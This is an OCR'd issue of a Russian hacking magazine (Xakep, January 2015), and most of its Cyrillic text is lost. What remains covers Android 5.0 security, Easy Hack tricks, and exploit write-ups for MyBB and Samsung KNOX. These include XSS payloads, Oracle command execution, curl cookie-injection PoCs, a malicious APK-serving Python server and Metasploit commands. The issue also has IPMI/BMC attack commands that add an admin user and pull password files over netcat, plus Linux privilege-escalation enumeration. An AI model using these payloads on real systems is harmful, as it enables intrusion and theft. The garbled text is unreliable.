01 /192/ 2015
39
SELinux
script (www.tarsnap.com/
scrypt.html),
TEE. , Android 5.0 PIN-, KEK.
script
PIN-
Android 4.4

PBKDF2. GPU (6- PIN 10 , 6-
4 hashcat),
script, , 20 000
GPU .
,
,
Android 5.0. ,
,
.
SEANDROID
SELinux,
,
. SELinux

. SELinux ,
, ,
Apache ,

. , SELinux , , .
Android SELinux SEAndroid (seandroid.
bitbucket.org)

SELinux-
.
4.2, Android, ( 4.24.3)
(
). 4.4
Google
,

(installd, netd, vold zygote). SELinux
5.0.
Android 5.0 60 SELinux ( )
,
init .
,
Android,
root,
, .
, CVE-2011-1823,

Android 2.3.4 memory corruption
vold,
root (
Gingerbreak), -
X-Mobile
40
Smart Lock
01 /192/ 2015
Android 5.0 WebView
, 5.0 , SELinux, vold

. CVE-2014-3100 Android 4.3,
keystore, 70% .
SELinux ,
( ++ ,
root),
root, , . ,
root
, SELinux
.
, , root SELinux- init.
SuperSU 2.23 (
, , init ,
su). recovery, , ,
root (
), .
, SELinux ,
, Android.

Android
4.2, ( , 4.2 Multiple User
Enabler). 4.3
,
INFO
Linux,
Android
MD5-
. Google
,

.
Android Device Manager
, .
Lollipop , . ,
,

. ,
, ,
.
screen pinning, ,
, .

, .

,
,

.
screen pinning - .
, PIN-
. PIN .
, ,
,
, 99%
, , ,
. Samsung Knox.
01 /192/ 2015
,
.
SMART LOCK
41
Google Chrome Android. ,

,
Android 5.0 .
KILL SWITCH
2013 Google -
PIN-
Android Device Manager, , Google .

5.0 Smart Lock,
.

, Google Play Google
.
Services,
Google
, Android 2.3.
,
Android 5.0,
.
Factory Reset Protection.

(Dan Campbell)
. Smart Lock
ChromeOS
,

, ,
Google,

Bluetooth
( ,
.
, TV Box),

NFC- Google
.

.

,
,

,

,
.
, ( Trusted

Bluetooth, ),
root
Tasker,

Pebble (
.
SWApp Link).

ChromeOS. , ,
Android
, PIN-
Android-, , Smart Lock ,
( Trusted Agents) ( Smart Lock ).
Bluetooth-, NFC- .
HTTPS TLS/SSL.

INFO
Android 5.0 TLSv1.1
Smart Lock.
TLSv1.2. ,
Forward Secrecy. ,
Android
AES-GCM,
. , , /
, ,

(MD5, 3DES) .
.

PIE . Android ,
WEBVIEW
.
Android PIE (Position-Independent Executables).
WebView WebKit, FORTIFY_SOURCE.
HTML/JS-
, stpcpy(), stpncpy(), read(), recvfrom(),
.
FD_CLR(), FD_SET() FD_ISSET(), . KitKat WebView
FORTIFY_SOURCE
GCC ( ). Chromium ( 33 Android 4.4.3),
FORTIFY_SOURCE
Android 4.2.
Google

-.
Google Android 5.0 ,
Lollipop, WebView
Chromium, Google
, ,
Play ( , : ). ,
Android
,
HTML/
root. , ,
JS-, , Lollipop
. , Google Android .
, -
42
X-Mobile
01 /192/ 2015
: VPN-, , ,
,
Opera Mini .
#3.
ONAVO EXTEND
AFWALL+
OPERA MINI
ADAWAY
4.0, Android
VPN.
, . Onavo
Extend VPN,
,
.

HTTP, ,

- .
AJAX , ,
, ,
.
,
Opera. Opera Max,
iOS Android.

,
, .
,
,
.
Android
,
iptables, .
AFWall+ .
: ,
( )
Wi-Fi
3G, .
iptables.
: root
.

. Android
,
.

,
.

Adblock,
AdAway.
AdAway ,
VPN, /system/etc/
hosts.
DNS-
.
Onavo Extend: goo.gl/YYA1j

: Android/iOS
:
AFWall+: goo.gl/eH7yb
: Android
: / open source

- .
,
, Opera Mini
.
Opera Mobile,
.
Opera
Mini
,
.
Opera Mini
HTML, JS, CSS.
OBML (Opera
Binary Markup Language),

Opera HTML OBML JavaScript .
OBML 90%,
,
- .
Opera Mini: goo.gl/9PoS31
: Android / iOS / Windows Phone
:
AdAway: goo.gl/2Qacc
: Android
:
10 /177/ 2013
43
Raspberry Pi
, .
Hint: .
44
01 /192/ 2015
EASY
HACK
GreenDog , Digital Security
agrrrdog@gmail.com,
twitter.com/antyurin
WARNING

. ,
, .
01 /192/ 2015
45
Easy Hack
ORACLE DB XE
, ( TNS)
SQL- -. ,
, , . Java.
. ,
Oracle, Express Edition (XE),
Jav Virtual Machine -. ?
! , .
begin
DBMS_SCHEDULER.create_program('any_name','EXECUTABLE',
'echo "any commands with parameters"',0,TRUE);
DBMS_SCHEDULER.create_job(job_name=>'any_job_name',
program_name=>'any_name',
start_date=>NULL,repeat_interval=?
>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);
dbms_lock.sleep(1);
dbms_scheduler.drop_program(program_name=>'any_name');
dbms_scheduler.purge_log;
end;
, . .
.
, ,
, .
? CHEATSHEET. - ,
,
:)
,
. -, , ,
, -. , . , , Internet Explorer
, Easy
Hack () .
Shazzer. ,
(=)
,
.
.
, , , (
.
, ) Android.
. , , Same Origin Policy. , SOP
- XSS, JavaScript . , ,
. ( , ,
, + + )
. ,
.
/ (,
SOP, , (http://evil.ru, ),
<svg/onload=alert(1)>), IE

`. , .
. , SOP ? -, cheatsheet,
:
(, OWASP: goo.gl/Ne8nGI).
<iframe name="test" src="http://gmail.com"></iframe>
-, . Shazzer (goo.gl/z0SrxG). -
<input type=button value="test" onclick="window.open
('\u0000javascript:alert(document.domain)','test')" >
. - . ,
http://evil.ru,
. , -, ,
(alert(document.domain)) Gmail. iframe ,
, -, ,
(input , ).
, , -
, (
.
SOP), ,
, ( ),
. \u0000 null-, . , , - ,
-
.
. , Android 4.4
: goo.gl/urMpHC.
46
JS
- . , .
, ,
.
-, , - . ,
XSS
JS
.

,
(, XSS).
.
, (
,
, ):
HTML, JavaScript.
, , ,
HTML-, JS.
?
,

. , HTML- JS, HTML
. ,
, >,
<, <, > ( , , ). , ,
.
.
, ( , , , ).
?
Telnet. ,
. , , PIN-.
, , : PAN ( ), expiration date CVV (
), .
,
. ,
, . ? , .
01 /192/ 2015
JavaScript : , , , , . ,
,
, . XSS. : goo.gl/vyEVAr.
Retire.js (goo.gl/qz6FZn).
. .
: , , Burp ZAP. rocket science, .
. , . , .
> <, X X.
, x .
< X. .
, .
(< <),
(script script) (onload onload).
JavaScript HTML,
HTML-. :
<img src=x onerror=alert(2);>

onerror alert(2). a .
, <script>
( HTML-).
JavaScript. . -,
escape-, \t, \r, \n. -, . , \141. : x
( \x61), u , 4
( \u0061).
, .
.
, (, , , ). :
<script>\u0061lert("\141\t\x62");</script>
, , ,
. , ,
.
, Visa/MasterCard NFC (PayPass, PayWave).

( 25%)
. , , .
c NFC, c NFC- (, ) . : PAN, exp date, Card Holder ( ),
, 20 , . ,
, CVV .
, . , ,
.
...
, CVV
, 3D Secure .
NFC, Banking card reader (goo.
gl/7dmjrH). Hackito Ergo Sum 2012: goo.gl/omSbfi.
01 /192/ 2015
47
Easy Hack
CROSS-SITE WEBSOCKET HIJACKING
, . HTML5
, , -.
- , TCP.
HTTP, -,
TCP-, , TCP-.
-,
( ).
. - ,
-, HTTPS . ws://
wss:// . - ( ) , .
, - GET - .
(
Host):
GET / HTTP/1.1
Host: victim.ru
Origin: http://evil.org
Sec-WebSocket-Key G54JzsUvsF7FWpzopP2HRw==
Sec-WebSocket-Version: 13
Connection: Upgrade
Upgrade: websocket
-
-. ,
( , ). Origin, , .
:
HTTP/1.1 101 Web Socket Protocol Handshake

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: content-type, x-websocket
-extensions, x-websocket-version, x-websocket-protocol
Access-Control-Allow-Origin: http://victim.ru
Sec-WebSocket-Accept: 5Lw1/qhX7PKx66t9+Rn+bV3x4Jg=?
Upgrade: websocket
.
CORS,
, . ,
- ( TCP-),
. : , , .
-
, SOP
.
, , , (
), -
. , -
- IronWASP
( , , 404, web/char ).
, , Cross-Site WebSocket Hijacking. .
, (origin) -
- ( ).
: -, -
- . -,
(
HTTP-), GET-, . , CSRF, -,
- .
. ,
. , Access-Control-Allow-Origin, :
, , -,
- . , , . , -.
, Origin ,
, . , ,
, - , , Origin .
: CSWSH CSRF-, .
, ,
.
, : CSWSH ?
, . XSS, JS
. , -
CSRF. , -
, , , ,
.
. , Burp (1.6)
,
- . ZAP
IronWASP (www.ironwasp.org).
- goo.gl/vMiOsu.
!
48
01 /192/ 2015
,
dukebarman.pro,
b.ryutin@tzor.ru,
@dukebarman

-
, , Android Samsung , , .
MYBB 1.8.2
CVSSv2: N/A
: 8 2014
: Taoguang Chen, Avinash Kumar Thapa
CVE: N/A
, PHP- MyBB , , .
, register_globals , MyBB
unset_globals(), PHP, $_POST, $_GET, $_FILES $_
COOKIE:
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
foreach(array_keys($array) as $key)
{
// - zend_hash_del_key_or_index
PHP <4.4.3 <5.1.4
01 /192/ 2015
49
unset($GLOBALS[$key]);
}
}
.

foo.php?_COOKIE=1,
$_GET['_COOKIE'].
, $_GET['_
COOKIE']=1, $GLOBALS['_COOKIE']:
...
}
...
{
...
foreach(array_keys($array) as $key)
{
, $_COOKIE . , , PHP, $_COOKIE ,
:
}
...
}
...
{
if(!is_array($array))
{
return;
}
$_GET $_FILES ,
unset_globals(), ,
PHP, .
$_POST['GLOBALS'], $_
FLIES['GLOBALS'] $_COOKIE['GLOBALS'].

$GLOBALS['GLOBALS'].
, $GLOBALS['key']
.
- ,
. , $_GET, $_FILES $_COOKIE .
:
$protected = array("_GET", "_POST", "_SERVER",

"_COOKIE", "_FILES", "_ENV", "GLOBALS");
foreach($protected as $var)
{
if(isset($_REQUEST[$var]) ||
isset($_FILES[$var]))
{
die("Hacking attempt");
}
}
,
.
$_REQUEST , $_GET, $_POST
$_COOKIE.
PHP 5.3 :
request_order = "GP"
php.ini.
$_REQUEST $_GET
$_POST $_COOKIE.
$_COOKIE['GLOBALS'] unset_globals()
PHP 5.3.
:
class MyBB {
...
function __destruct()
{
if(function_exists=("run_shutdown"))
{
run_shutdown();
}
}
}
run_shutdown():
function run_shutdown()
{
global $cong, $db, $cache, $plugins,
$error_handler, $shutdown_functions,
$shutdown_queries, $done_shutdown, $mybb;
...
//
shutdown,

if(is_array($shutdown_functions))
{
foreach($shutdown_functions as function)
{
call_userfunc_array
($function['function'],
$function['arguments']);
}
}
$done_shutdown = true;
}
$shutdown_functions
add_shutdown() init.php:
//
shutdown- ,

add_shutdown('send_mail_queue');
add_shutdown() :
function add_shutdown($name, $arguments=array())

{
global $shutdown_functions;
if(!is_array($shutdown_functions))
{
$shutdown_functions = array();
}
if(!is_array($arguments))
{
$arguments = array($arguments);
}
if(is_array($name) && method_exists
($name[0], $name[1]))
{
$shutdown_functions[] =
array('function' => $name,
'arguments' => $arguments);
return true;
}
else if(!is_array($name) &&
function_exists($name))
{
$shutdown_functions[] =
WARNING

. ,

,
.
50
array('function' => $name,

'arguments' => $arguments);
return true;
}
return false;
}
, , $shutdown_functions
- , .
EXPLOIT
,
:
request_order = "GP"
register_globals = On
. phpinfo():
$ curl --cookie "GLOBALS=1; shutdown_functions[0]

[function]=phpinfo; shutdown_functions[0]
[arguments][]=-1" http://www.target/
01 /192/ 2015
require_once "./inc/init.php";

$shutdown_queries ,
SQL-.
request_order = "GP" register_globals =
On:
$ curl --cookie "GLOBALS=1; shutdown_queries[]=

SQL_Inj" http://www.target/css.php
disable_functions = ini_get register_globals = On:
css.php?shutdown_queries[]=SQL_Inj
, (Taoguang Chen) 6 security-,
.
,
. .
, XSS
. :
*User CP >Edit Prole > **Custom User Title*

, PHP
:
disable_functions = ini_get
<img src=x onerror=alert('XSS');>
unset_globals , register_globals:
/upload/calendar.php,
.
alert-.
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_FILES);
}
TARGETS
MyBB <= 1.8.2;
MyBB 1.6 <= 1.6.15.
SOLUTION
.
disable_functions = ini_get
register_globals = On:
index.php?shutdown_functions[0][function]=
phpinfo&shutdown_functions[0][arguments][]=-1
, run_shutdown() SQL:
function run_shutdown()
{
global $cong, $db, $cache, $plugins,
$error_handler, $shutdown_functions,
$shutdown_queries, $done_shutdown, $mybb;
...
//

shutdown-
if(is_array($shutdown_queries))
{
//

foreach($shutdown_queries as $query)
{
$db->query($query);
}
}
global.php:
$shutdown_queries = array();
global.php,
css.php:
SAMSUNG GALAXY KNOX ANDROID

BROWSER
CVSSv2: N/A
: 12 2014
: Quarkslab
CVE: N/A
Quarkslab Samsung
Galaxy S5 , .
UniversalMDMApplication, . Samsung Galaxy
S5 ROM ( ) Samsung KNOX.

, ,
, , .

, , , .
( )
HTML-, Chrome
.
01 /192/ 2015
51
MITM-, JavaScript- HTML, .

UniversalMDMClient Samsung KNOX
,
URI smdm://. AndroidManifest.xml :
<manifest android:versionCode="2"
android:versionName="1.1.14" package=
"com.sec.enterprise.knox.cloudmdm.smdms"
xmlns:android="http://schemas.android.com/apk/res/
android">
<uses-sdk android:minSdkVersion="17"
android:targetSdkVersion="19" />
[...]
<uses-permission android:name="android.
permission.INSTALL_PACKAGES" />
[...]
<application android:allowBackup="true"
android:name=".core.Core">
<activity android:congChanges="keyboard|
keyboardHidden|orientation" android:
excludeFromRecents="true"
android:label="@string/titlebar" android:
name=".ui.LaunchActivity"
android:noHistory="true" android:theme=
"@android:style/Theme.DeviceDefault">
<intent-lter>
<data android:scheme="smdm" />
<action android:name="android.intent
.action.VIEW" />
<category android:name="android.intent.
category.DEFAULT" />
<category android:name="android.intent
.category.BROWSABLE" />
</intent-lter>
</activity>
[...]
</application>
</manifest>
intent-lter, com.sec.
enterprise.knox.cloudmdm.smdms.ui.LaunchActivity.
smdm:\\... onCreate LaunchActivity.
proguard, . -
.
, ,
PreETag.xml
/data/data/com.
sec.enterprise.knox.cloudmdm.smdms/shared_prefs/ getPreETAG(): ,
nish(). .
Intent,
Activity, , . :
smdm://hostname?var1=value1&var2=value2

:
seg_url;
update_url;
email;
mdm_token;
program;
quickstart_url.
, ,
update_url.
onCreate

onCreate
Core.
startSelfUpdateCheck()
Core.
shared_preference, onCreate() Core.startSelfUpdateCheck().

Core.startSelfUpdateCheck() ,
, , UMCSelfUpdateManager.
, -, URL,
umc_cdn shared_pref-
m.xml, /latest. umc_cdn Intent udpdate_url.
.
UMCSelfUpdateManager.doUpdateCheck() URL.
ContentTransferManager
HTTP-, URL, . handleRequestResult : onFailure(),
onProgress(), onStart(), onSucess() .
52
01 /192/ 2015
UMCSelfUpdateManager.
, , onSucess().
, : ETag, ContentLength x-amz-meta-apk-version.
x-amz-meta-apk-version
UniversalMDMApplication APK-. , . ,
.
.
YES,
UMCSelfUpdateManager.onSuccess(), GET-
APK-. beginUpdateProcess() updateThread.
, run
updateThread installApk, _installApplication().
: , APK- ,
. , -

Samsung
updateThread

_installApplication()
UMCSelfUpdateManager.
doUpdateCheck()

onSucess()
01 /192/ 2015
53
.
:
Settings$Global.putInt(InstallManager.mContext.
getContentResolver(), GlobalSettingsAdapter.
PACKAGE_VERIFIER_ENABLE_0);
, ,
,
,
, . .
:
- ,
ETag, :
/data/data/com.sec.enterprise.knox.cloudmdm.
smdms/shared_prefs/PreETag.xml
onCreate() , , .
Samsung
Samsung KNOX
EXPLOIT
, . HTML-
JavaScript- ( ):
Metasploit- :
<script>
function trigger(){
document.location="smdm://meow?
update_url=http://yourserver/";
}
setTimeout(trigger, 5000);
</script>
, JavaScript-, ,
(
). :
x-amz-meta-apk-version ,
, . , 1337;
ETag MD5- APK-;
Content-Length APK- ( ).
Python- :
import hashlib
from BaseHTTPServer import
BaseHTTPRequestHandler
APK_FILE = "meow.apk"
APK_DATA = open(APK_FILE,"rb").read()
APK_SIZE = str(len(APK_DATA))
APK_HASH = hashlib.md5(APK_DATA).hexdigest()
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Length",
APK_SIZE)
self.send_header("ETag", APK_HASH)
self.send_header
("x-amz-meta-apk-version", "1337")
self.end_headers()
self.wle.write(APK_DATA)
return
def do_HEAD(self):
self.send_response(200)
self.send_header("Content-Length",
APK_SIZE)
self.send_header("ETag", APK_HASH)
self.send_header
("x-amz-meta-apk-version", "1337")
self.end_headers()
return
if __name__ == "__main__":
from BaseHTTPServer import HTTPServer
server = HTTPServer(('0.0.0.0',8080), MyHandler)
server.serve_forever()
msf > use exploit/android/browser/

samsung_knox_smdm_url
msf exploit(samsung_knox_smdm_url) >
set LHOST 192.168.41.186
msf exploit(samsung_knox_smdm_url) > exploit
(bit.ly/1yWD0DX)
.
TARGETS

Samsung Galaxy S5;

Samsung Galaxy S4 (version checked: I9505XXUGNH8);
Samsung Galaxy S4 mini (version checked: I9190UBUCNG1);
Samsung Galaxy Note 3 (version checked: N9005XXUGNG1);
Samsung Galaxy Ace 4 (version checked: G357FZXXU1ANHD).
SOLUTION
,
, . , : ,
(
UniversalMDMClient), ,
.
.
. ( bit.ly/1AK3OGR):
smdm://patch/

Samsung UMC (Universal MDM Client) :
http://umc-cdn.secb2b.com:80
UniversalMDMClient.apk. (Samsung
Galaxy S5, Note 4 Alpha).
...
;).
54
01 /192/ 2015
photonewman@shutterstock.com
,
Positive Technologies
vshilnenkov@ptsecurity.com
IPMI/BMC
IPMI,
IPMI.
IPMI/BMC
IPMI , , . .
BMC IPMI. (system on a chip)
.
, ,
.
Integrated Lights Out (iLO) Hewlett-Packard (HP). HP iLO
BMC/IPMI. , . , , ARM Linux .

:
Reset / /
, .
IPMI/BMC .
, ,
.
:
- ( );
IPMI over LAN (UDP 623);
( ,
). : WMI , OpenIPMI, IPMItool Linux.
- . , .
, .
IPMI over LAN, , UDP 623.
IPMI ,
/dev/ipmi0, .
IPMI IPMItool
GNU/Linux, .
01 /192/ 2015
55
IPMI Authentication Bypass via Cipher 0
. IPMI 2.0.
.
,
.
IPMI/BMC
IPMI/BMC 2013 ,
. IPMI/BMC
shodanhq.com ( . . .). ,
. .
IPMI/BMC.
IPMI/BMC ( , ),
VirtualConsole (aka KVM) , , roota LiveCD
, Windows. , root (
). , IPMI . IPMI/BMC

, .
IPMI/BMC.
IPMI/BMC . , IPMI/BMC .
. , , .
IPMI/BMC
UDP 623, IPMI 2.0, .
PC
metasploit - auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool I lanplus C 0 H targetIP U
Administrator P anypasswordhere user list
IPMI 2.0 RAKP Authentication Remote Password Hash

Retrieval

. IPMI 2.0
UDP 623, IPMI 2.0 user-logins.
PC
metasploit - auxiliary/scanner/ipmi/
ipmi_dumphashes
http://sh2.com/ipmi/tools/rak-the-ripper.pl
IPMI Anonymous Authentication / Null user
- null user, - anonymous authentication.

- , - null user / anonymous ( ).
null user, .
anonymous authentication, admin IPMI Chips with ATEN-Software.
(bit.ly/1iZItyM)
. Rapid7 (bit.ly/1kAtHVh)
null user .
,
.
NULL authentication
.
IPMI 1.5.
, . ,
.
HP;
Dell;
Supermicro.
UDP 623, IPMI 1.5, .
PC
ipmitool -A NONE -H targetIP bmc guid
HP;
Dell;
Supermicro.
IPMI BMC
(Dan Farmer) (bit.ly/1fx1wAW). ,
,
: bit.ly/1zthsgv.
.
, IPMI/
BMC :
(,
-);
IPMI.
HP;
Dell;
Supermicro.
HP;
Dell;
Supermicro ( IPMI Chips with ATEN-Software).
WARNING

. ,

,
.
UDP 623.
PC
metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes
ipmitool -I lanplus -H targetIP -U '' -P '' user list
Supermicro IPMI UPnP Vulnerability
Supermicro UPnP SSDP UDP

1900. .
56
01 /192/ 2015
Supermicro.
IPMI
1900.
PC
metasploit exploit/multi/upnp/libupnp_ssdp_overflow
metasploit auxiliary/scanner/upnp/ssdp_msearch
Supermicro IPMI Clear-text Passwords
IPMI 2.0 , -
. Supermicro /nv/PSBlock /nv/PSStore,
firmware.
, BMC Nuvoton WPCM450
TCP- 49152 ,
/nv, PSBlock,
server.pem .
Supermicro.
Shell-?
PC
cat /nv/PSBlock
echo GET /PSBlock | nc targetIP 49152
NULL authentication / IPMI
Authentication Bypass via Cipher 0, IPMI 2.0 RAKP
Authentication Remote Password Hash Retrieval, IPMI
Anonymous Authentication IPMI. , . ,
UPnP- Supermicro (Supermicro IPMI
UPnP Vulnerability), CVE-2012-5958 (BoF libupnp).
Supermicro
Supermicro X9, ,
.
HANDS-ON LAB
IPMI. ipmi_version,
John the Ripper

oclHashcat
Metasploit,
. / Metasploit , ipmiping
rmcpping.
IPMI,
Authentication
Bypass via Cipher 0 ( ). ,
.
: , .

.
Metasploita ipmi_dumphashes
. :

. ipmi_dumphashes , , . ,
, .
oclHashcat, John the
Ripper c jumbo- (community edition).
( . . .), .
oclHashcat, 1.30,
.
HP iLO4, . ,
Administrator uppercase + numeric.
.
cipher 0
. IPMItool. GNU/Linux . Windows
Cygwin. :
1. , ,
ID.
01 /192/ 2015
57
, ? .
, , ipmicd C
Windows/Linux.

IPMI/BMC, ( ipmi_dumphashes
Metasploit). ,
Metasploit ,
IPMI/BMC - , Metasploit .
GitHub (bit.ly/12GLwLA). :
1. -p ,
.
2. -d .
3. -v N
0..5. N = 1 .
, . ,
-d -p
, IPMI-. -d
, . - ,
ipmitool I lanplus C 0 H 1.1.1.1 U

Administrator P anypasswordhere user list
2. .
ipmitool I lanplus C 0 H 1.1.1.1U Administrator

P anypasswordhere user set name <ID> hacker
3. .

Administrator P anypasswordhere user
set password <ID> hackerpass
4. .

Administrator P anypasswordhere user priv <ID> 4
5. .

Administrator P anypasswordhere user enable <ID>
HP KVM
,
, -, SSH SMASH , - KVM.
KVM,
,
BIOS, . KVM . , HP
iLO4 TCP 17988 17990. Dell
iDRAC7 TCP 5900. Cisco ICM TCP 2068.
, HP BladeSystem Onboard
Administrator. HP BladeSystem ,
-. , -
IPMI.
IPMI SSO. ,
, - :).
, HP
iLO4, KVM SMASH (: SSH) TEXTCONS.
, 80, 443, 17990.
HP BladeSystem
Onboard Administrator
-v 5
.
Linux GCC
gcc ipmicd.c -static -o ipmicd.
Windows MinGW gcc
ipmicd.c -mno-ms-bitelds -lws2_32 -DMINGW.
, PoC LiveCD (bit.
ly/1z1woEg), Windows.

LiveCD.
: IPMI/BMC .
- SMASH,
,

IPMI/BMC .
, IPMI/BMC.

BMC .

. ,
-
, .
Stay tuned!
58
01 /192/ 2015
?

BOF

white hat, security, ZeroNights
.
Principal Security
Engineer Nokia,
HERE.
alexey.sintsov@here.com
, ,
, . - / , , , ,
, , . ,
.

,
,
/,
. : , ( ), ,

.
, ,
,
CERT .
, ,
. ,
, ,
1988
,
.
, , ,
1988 ,

1972 ! (
, ) Computer Security Technology
Planning Study. -
,
(csrc.nist.gov/
publications/history/ande72.pdf).

, .
( HeartBleed) . 1972
, 2014-
. , .
,
80- , 90- .
, 1961- 1988-
, ,
( )
, .
80-

, , .
,
( ) ,
,
: .
,

, .
,
, , . :

,
.
- 1990-, 2000-.
,
: . , 1972 ,
1988 . , 26
, ,
,
(19031957). , BoF
01 /192/ 2015
59
( , ,
, ).
, ,
.
, 1972- 1988- , .
, BBS
, .
, - ,

, 1988 ,
. . .
,
,
, 1990 (ftp://
ftp.cs.wisc.edu/paradyn/technical_papers/fuzz.
pdf). ,
, , .
,
(, ), .
,
(. 1965). , BoF
1995
(seclists.org/bugtraq/1995/Feb/109). NCSA HTTPD ,
,
HTTP-, 1993
bugtraq. . , , 1995
. ,
, , , , .
. ,
, , , , , .
1996 , ,
www.phrack.org/issues/49/14.
html#article. ,
. , ,

,
. ,
,
, .
,
. ,
,
( ),
,
- .
1998 ( )
USENIX Security Symposium
StackGuard stack canaries. :

. ,
, : c
,
, .
- , ,
.
2001 , , ,
. , ,
2000-:
, SEH-,
NX . , ,

,
(
, ). Open Source,
MS, , , DEP, PIE, FORTIFY.
,
( ) .
,
, ,
, ,

.
2000-

(Windows/*nix
). ,
2000- . ,
2000-
2000-,

, ( , ).
BoF ( ,
), (
), ( , , EMET) (, , 2005
NX-).
-
, , ,
, .
, -
( , ).
, ,
1972- 2014-

.
1996 2012 ( ),
, , (
).
,
, , ,
.
,
BoF, .
Google Microsoft, ,
, . .
8090-
, , ,
, (
),
. ,
,
.
, - . ,

,
. , ,
, , , .
.
C , , ,
,
.
,
,
, RCE
. , ,
: ,
. , BoF ,
.
QNX ARM-
( ) NX, ASLR. , ,
, . , , ,
SDLC, , , !
60
01 /192/ 2015
JoAnn Gould@shutterstock.com
ant
ant@real.xakep.ru
01 /192/ 2015
61
62
01 /192/ 2015
,
Windows. , . , , . ,
, ,
. ? , ...
PREFASE
( ),
.
, . ,
,
. . ,
- , ,

, .
, .
, Windows, - ,
.
, .

Linux .
.
Windows, c ,
.
Linux- .
?

, . ,
. ,
,

(, , ,
).
:
1. .
2.
.
3. .
4. ( ) .
5. root.
.
, ,
, .
uname -a .
,
, *-release, etc ( -: lsb-release Ubuntu,
redhat-release Red Hat / CentOS ):
WARNING

. ,

,
.
cat /etc/*-release
,
.

, . , , exploit-db.
com, : 1337day (bit.ly/12e2Erd),
ExploitSearch
(bit.
SecuriTeam
(bit.ly/1wOdrFI),
ly/1yYgrxM), Metasploit (bit.ly/1u42z0n), securityreason
(bit.ly/1s8XRhr), seclists (bit.ly/1u8f1LI). ,
, .
, :
, . ,
:
- .
. .
. , ( tmp
). -
, grsecurity (bit.ly/1wcJIa3).
63
01 /192/ 2015
www.cvedetails.com
packetstormsecurity.org/files/cve/[CVE]
cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
www.vulnview.com/cve-details.php?cvename=[CVE]
, , ,
.
- .

,
, cURL/
wget, Netcat, FTP, SCP/SFTP, SMB
DNS TXT . ,
, :
nd
nd
nd
nd
nd
/
/
/
/
/
-name
-name
-name
-name
-name
wget
nc*
netcat*
tftp*
ftp
, Netcat.
:
nc -l -p 1234 > out.le

1234. :
nc -w 3 [destination] 1234 < out.le

*nix- *nix, ,
. :

:
1. LinEnum (bit.ly/15VINz5) bash-,
, ,
cheat sheete (bit.ly/1G0sHPv).
65 , SUID/GUID-. ,
, -. : ./LinEnum.sh -k keyword -r report -e /tmp/ -t.
, ,
.
2. LinuxPrivChecker (bit.ly/1G0utA2) Python-,
. -,
: , ... , , , , .
:).
3. Unix-privesc-check (bit.ly/1q9eFch)

Linux, Solaris, HPUX, FreeBSD. , .
4. g0tmi1ks Blog (bit.ly/12OU82M) ,
, .
, , .
nc -l -p 1234 | uncompress -c | tar xvfp //

tar cfp - /some/dir | compress -c | nc -w 3

[destination] 1234 //
, wget, FTP
.
, , .
? , , .
, - . , (, .secret_folder),
. . , : /tmp/.nothingthere/
exploit.c. ,
, tmp noexec

( mount).

,
/. , Python/Perl/PHP. ][ ,

, .
gcc -v
bash gcc: command not found, ,
. , - ,

.

,

64
01 /192/ 2015
.

(,
,
,
).
,
,

.
,
:
nd
nd
nd
nd
/
/
/
/
-name
-name
-name
-name
perl*
python*
gcc*
cc

LinEnum

. , , .
sudo nd / -xdev $-perm 4000$ -type f

-print0 -exec ls -s {} \;
, ,
,
, ,
, . , Microsoft
Windows, ,
.
,

:
nd / -perm 2 !
-type l -ls

,
- :
, /, , init
cron. ,
,
, .
, / /
. , ,
chmod 777.
, .
Setuid + setgid
, setuid setgid
,
( root).
,
, -
. ,
setuid ls
,
.
vim
,
.
,
setuid/setgid, , buffer
overflow command
injection,
.
.
Unix-privesc-check

, sudo,
, , .

. ,
, (, ).

. command injection.

, .
SUDO
sudo (substitute
user and do),
,
.

root ( ),
, .

/etc/sudoers. .
, . , ,
.

( Offensive security, : bit.ly/1A62EUU).
01 /192/ 2015
65
PATH
,
.
PATH ( printenv ). ?
, : , PATH . (.:/bin:/usr/sbin
....)? ,
,
: $ program $ ./program.
. PATH / . :
PATH=.:${PATH}
export PATH
,
: () . ,
sudo- , . ,
. PATH.
,
LinuxPrivChecker

,

Exploit
Database
, ls ,
. , ,
, , .
, :
1. . PATH.
2. - , .bashrc .prole:
PATH=`echo $PATH | sed -e 's/::/:/g;

s/:.:/:/g; s/:.$//; s/^://'`
AFTERWORD
, Linux .
: , ,
, .
, , , win-, nix. !
: ,
, ,
. ,
,

66
01 /192/ 2015
WARNING
! ! , !
X-TOOLS
D1g1
Digital Security
@evdokimovds

: Nicolas
Economou
: Windows
URL: https://github.
com/CoreSecurity/
Agafi
: Katja Hahn
: Windows/
Linux
URL: https://
katjahahn.github.io/
PortEx/
: Vu Quoc Huy
: Linux
com/c633/malwaRE
ROP
PORTEX
MALWARE REPOSITORY FRAMEWORK
ROP-- . ,
? ,
, .
, ? , ,
ROP-.

ROP- DEP.
Agafi (Advanced Gadget Finder) /
++ ROP-
( ). ,
, EEREAP. .
QEMU
diStorm3.
:
agafi ROP-
( );
agafi-rop ROP-
DEP ( kernel32.VirtualProtect);
gisnap fsnap
.
PortEx Java- PE, . PE-.

Java Scala.
:
MS DOS
Header, COFF File Header, Optional Header,
Section Table;
: import section,
resource section, export section, debug section,
relocations, delay-load imports;
sections, overlay, embedded ZIP, JAR
class ;
,
;
PE-
;
;
JAR-,
exe (, exe4j, JSmooth,
Jar2Exe, Launch4j);
Unicode- ASCII- ;
overlay.
MalwaRE ,
PHP Laravel , ,

. MalwaRE
Adlice (www.adlice.com/softwares/
malware-repository-framework/),
.
:
(
PHP/MySQL-);
VirusTotal
( );
( AV,
, , );
URL
;
;

VirusTotal;
.
,
. ,
x86-.

Agafi/ROP (goo.gl/0W347j) EkoParty 2014.
portex.pom
portex.jar :
$ mvn install:install-le-Dle=portex.
jar -DpomFile=portex.pom
Wiki (https://github.com/katjahahn/
PortEx/wiki).

(
).
.
67
01 /192/ 2015
ANTI-ANTI-DEBUG
: Carbon Monoxide
: Windows
URL: https://bitbucket.org/NtQuery/scyllahide
ScyllaHide ,
, .
x64/x86-.
:

usermode .
ring 0 TitanHide (https://
